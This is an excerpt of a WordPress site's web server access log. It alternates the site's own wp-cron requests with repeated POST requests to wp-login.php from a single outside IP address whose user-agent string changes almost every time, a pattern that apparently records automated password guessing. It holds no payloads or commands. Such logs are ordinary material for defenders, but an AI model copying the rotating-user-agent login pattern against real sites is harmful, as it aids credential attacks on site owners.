36.133.115.36 - - [15/Oct/2025:21:59:30 +0800] "POST /wp-cron.php?doing_wp_cron=1760536770.0141580104827880859375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
141.98.11.188 - - [15/Oct/2025:21:59:30 +0800] "POST /wp-login.php HTTP/1.1" 200 2973 "http://cqqizhou.com/wp-login.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
36.133.115.36 - - [15/Oct/2025:21:59:55 +0800] "POST /wp-cron.php?doing_wp_cron=1760536795.0786280632019042968750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
141.98.11.188 - - [15/Oct/2025:21:59:55 +0800] "POST /wp-login.php HTTP/1.1" 200 2891 "http://cqqizhou.com/wp-login.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
36.133.115.36 - - [15/Oct/2025:22:00:49 +0800] "POST /wp-cron.php?doing_wp_cron=1760536849.2211720943450927734375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
141.98.11.188 - - [15/Oct/2025:22:00:49 +0800] "POST /wp-login.php HTTP/1.1" 200 2920 "http://cqqizhou.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15"
141.98.11.188 - - [15/Oct/2025:22:01:19 +0800] "POST /wp-login.php HTTP/1.1" 200 2920 "http://cqqizhou.com/wp-login.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
36.133.115.36 - - [15/Oct/2025:22:02:11 +0800] "POST /wp-cron.php?doing_wp_cron=1760536931.2968940734863281250000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
141.98.11.188 - - [15/Oct/2025:22:02:11 +0800] "POST /wp-login.php HTTP/1.1" 200 2979 "http://cqqizhou.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:118.0) Gecko/20100101 Firefox/118.0"
36.133.115.36 - - [15/Oct/2025:22:03:05 +0800] "POST /wp-cron.php?doing_wp_cron=1760536985.1443789005279541015625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
141.98.11.188 - - [15/Oct/2025:22:03:05 +0800] "POST /wp-login.php HTTP/1.1" 200 2982 "http://cqqizhou.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15"
36.133.115.36 - - [15/Oct/2025:22:03:54 +0800] "POST /wp-cron.php?doing_wp_cron=1760537034.7178740501403808593750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
141.98.11.188 - - [15/Oct/2025:22:03:54 +0800] "POST /wp-login.php HTTP/1.1" 200 2976 "http://cqqizhou.com/wp-login.php" "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
